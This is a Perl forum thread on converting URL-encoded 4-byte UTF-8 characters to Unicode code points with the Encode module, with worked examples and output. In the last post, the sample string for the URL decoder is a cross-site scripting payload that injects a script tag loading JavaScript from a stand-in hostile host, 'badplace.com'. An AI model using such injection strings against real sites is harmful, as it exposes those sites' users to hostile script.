Converting UTF-8 to Unicode hex with Perl

FangQ

I need to convert a UTF-8 encoded character to its corresponding
Unicode code point. Because these characters lie in the range
0x20000-0x2FFFF, my old approach of using Text::Iconv (from UTF-8 to
UCS-2) no longer works. Is there a better approach? (Converting to the
surrogate pair would also be fine.)

As an example, the URL-encoded UTF-8 character (4 bytes) is
"%F0%A1%BF%AA", and I want the output to be 0x21FEA.

Thanks in advance!
 
Peter J. Holzer

Use the "decode" function from the Encode module:

use Encode qw(decode);

# $bytes holds the raw UTF-8 octets
my $characters = decode('UTF-8', $bytes);

for (split(//, $characters)) {
    printf("%#x\n", ord);
}
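
For the URL-encoded input from the question, the percent escapes have to be turned back into raw octets before decode can be applied. A minimal sketch, assuming the input contains only %XX escapes and literal ASCII; the helper name url_to_codepoints is made up for this example:

```perl
use strict;
use warnings;
use Encode qw(decode);

# Hypothetical helper: percent-encoded UTF-8 in, list of code points out.
sub url_to_codepoints {
    my ($escaped) = @_;
    # Turn each %XX escape back into a single raw octet.
    (my $bytes = $escaped) =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    # Strict UTF-8 decoding; FB_CROAK makes decode die on malformed input.
    my $characters = decode('UTF-8', $bytes, Encode::FB_CROAK);
    return map { ord($_) } split //, $characters;
}

printf "0x%X\n", $_ for url_to_codepoints('%F0%A1%BF%AA');   # prints 0x21FEA
```

Because decode returns Perl characters rather than 16-bit units, code points above 0xFFFF come back as a single value from ord.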

hp
 
sln

Something like below should help.

-sln

------------------------
use strict;
use warnings;
use Encode;
binmode STDOUT, ':utf8';

print "\n";

my $tmp = "\x{21fea}";

# Characters -> UTF-8 octets
my $octets = encode ("UTF-8", $tmp);
print "Encoded string:\n";
print " length = ".length($octets)."\n";
print " octets = $octets\n";
print " URL val = ";
for (split //, $octets) {
    printf ("%%%02X", ord($_));
}
print "\n\n";

# UTF-8 octets -> characters
my $string = decode ("UTF-8", $octets);
print "Decoded string:\n";
print " length = ".length($string)."\n";
print " string = $string\n";
print " HEX val = ";
for (split //, $string) {
    printf ("0x%X", ord($_));
}
print "\n";

__END__

Output:

Encoded string:
 length = 4
 octets = ð¡¿ª
 URL val = %F0%A1%BF%AA

Decoded string:
 length = 1
 string = 𡿪
 HEX val = 0x21FEA
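
The question also mentions that a surrogate pair would be acceptable. UCS-2 has no room for code points above 0xFFFF, which is why UTF-16 splits them into two 16-bit units. A rough sketch of that arithmetic follows; the helper name to_surrogates is invented for the example, and the last line cross-checks the result against Encode's own UTF-16BE output:

```perl
use strict;
use warnings;
use Encode qw(encode);

# Hypothetical helper: split a supplementary code point (U+10000..U+10FFFF)
# into its UTF-16 high and low surrogates.
sub to_surrogates {
    my ($cp) = @_;
    die "not a supplementary code point\n" if $cp < 0x10000 || $cp > 0x10FFFF;
    my $v = $cp - 0x10000;              # 20-bit offset into the supplementary range
    return (0xD800 + ($v >> 10),        # high surrogate: top 10 bits
            0xDC00 + ($v & 0x3FF));     # low surrogate: bottom 10 bits
}

printf "0x%X 0x%X\n", to_surrogates(0x21FEA);    # prints 0xD847 0xDFEA

# Cross-check: encode to UTF-16BE and read the result as 16-bit units.
printf "0x%X 0x%X\n", unpack 'n*', encode('UTF-16BE', "\x{21FEA}");
```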
 
FangQ

Thank you both for the quick response. I followed your examples and
got the conversion working.


Qianqian
 
sln

One last question. If you can't decode the URL with that module
(because of the embedded 4-byte UTF-8), what are you using?

-sln
-----------------------------------
use strict;
use warnings;
use Encode;
binmode STDOUT, ':utf8';

# Matches anything outside the URL "unreserved" set
# (RFC 2396: alphanumerics plus - _ . ! ~ * ' ( ) )
my $urlchrs = qr/[^\w.!~*'()-]/;

my $url_encoded_sample = 'http://target/getdata.php?data=<script src="http://
www.badplace.com%2fnasty%F0%A1%BF%AA.js%22%3e%3c%2fscript%3e';
# 4-byte UTF-8          ^^^^^^^^^^^^

# test prints of URL encoded sample ...
print "\nSample:\n$url_encoded_sample\n",'-'x20,"\n";
print "\n", decodeURL( $url_encoded_sample ),"\n";
print "\n", encodeURL( decodeURL( $url_encoded_sample ) ),"\n";
print "\n", decodeURL( encodeURL( decodeURL( $url_encoded_sample ) ) ),"\n\n";

# Decode the UTF-8; code points above 255 are printed as \x{...} escapes ...
for (split //, decode ('UTF-8', decodeURL( $url_encoded_sample ) )) {
    my $uchar = ord;
    if ($uchar > 255) {
        printf ("\\x{%X}", $uchar);
    } else {
        print;
    }
}
print "\n";
exit 0;

# subs ...

# %XX escapes -> raw octets (the result is still undecoded UTF-8)
sub decodeURL {
    my $bytes = shift;
    $bytes =~ s/%([0-9a-fA-F]{2})/ pack ("C", hex($1)) /ge; # octets 'C'
    return $bytes;
}

# raw octets -> %XX escapes (expects octets, not decoded characters)
sub encodeURL {
    my $text = shift;
    $text =~ s/($urlchrs)/ sprintf ("%%%02X", ord($1)) /ge;
    return $text;
}

__END__

Output:

Sample:
http://target/getdata.php?data=<script src="http://
www.badplace.com%2fnasty%F0%A1%BF%AA.js%22%3e%3c%2fscript%3e
--------------------

http://target/getdata.php?data=<script src="http://
www.badplace.com/nastyð¡¿ª.js"></script>

http%3A%2F%2Ftarget%2Fgetdata.php%3Fdata%3D%3Cscript%20src%3D%22http%3A%2F%2F%0A
www.badplace.com%2Fnasty%F0%A1%BF%AA.js%22%3E%3C%2Fscript%3E

http://target/getdata.php?data=<script src="http://
www.badplace.com/nastyð¡¿ª.js"></script>

http://target/getdata.php?data=<script src="http://
www.badplace.com/nasty\x{21FEA}.js"></script>
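
One caveat with encodeURL above: it works on octets. Given an already decoded string containing U+21FEA, ord would return 0x21FEA and the escape would come out as %21FEA. A possible variant that encodes to UTF-8 first is sketched below; the name encode_url_utf8 and the choice of the RFC 3986 unreserved set (letters, digits, "-", ".", "_", "~") are assumptions made for this example, not part of the code above:

```perl
use strict;
use warnings;
use Encode qw(encode);

# Hypothetical helper: percent-encode a string of characters (not octets).
sub encode_url_utf8 {
    my ($text) = @_;
    my $bytes = encode('UTF-8', $text);     # characters -> UTF-8 octets
    # Escape every octet outside the RFC 3986 unreserved set.
    $bytes =~ s/([^A-Za-z0-9\-._~])/sprintf('%%%02X', ord($1))/ge;
    return $bytes;
}

print encode_url_utf8("nasty\x{21FEA}.js"), "\n";   # prints nasty%F0%A1%BF%AA.js
```

Since every escaped unit is a single octet, each escape always has exactly two hex digits.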
 
